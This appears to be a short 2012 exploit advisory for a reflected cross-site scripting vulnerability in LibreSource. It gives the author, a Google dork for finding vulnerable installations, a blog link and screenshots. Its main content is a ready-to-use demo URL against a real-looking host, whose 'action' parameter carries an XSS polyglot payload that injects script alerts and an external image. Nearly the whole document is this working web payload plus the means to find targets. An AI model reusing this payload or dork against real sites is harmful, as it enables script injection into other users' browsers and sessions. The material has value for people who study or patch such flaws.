# Exploit Title: LibreSource Cross Site Scripting
# Date: 25.02.2012
# Author: Sony
# Software Link: http://dev.libresource.org/
# Google Dorks: intext:Printable version - LibreSource
# Web Browser : Mozilla Firefox
# Blog : http://st2tea.blogspot.com
# PoC:
http://st2tea.blogspot.com/2012/02/libresource-cross-site-scripting.html
..................................................................
Demo:
http://dev.libresource.org/home/development/bug?action=security%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E%3Cimg%20src=http://t0.gstatic.com/images?q=tbn:ANd9GcRgddzl0Tz_wbi8T0Tu1ZetkGvX6pxzpZ4JSRcT0KkSklde27lp3g%20align=center%3E
http://3.bp.blogspot.com/-K_naM_V5hgU/T0jUs_fpMsI/AAAAAAAAAm8/4UyV--Ybtlo/s1600/1.JPG
http://1.bp.blogspot.com/-HWhSkd9eNhM/T0jUvm64CsI/AAAAAAAAAnI/6mh2iKZFrR4/s1600/2.JPG
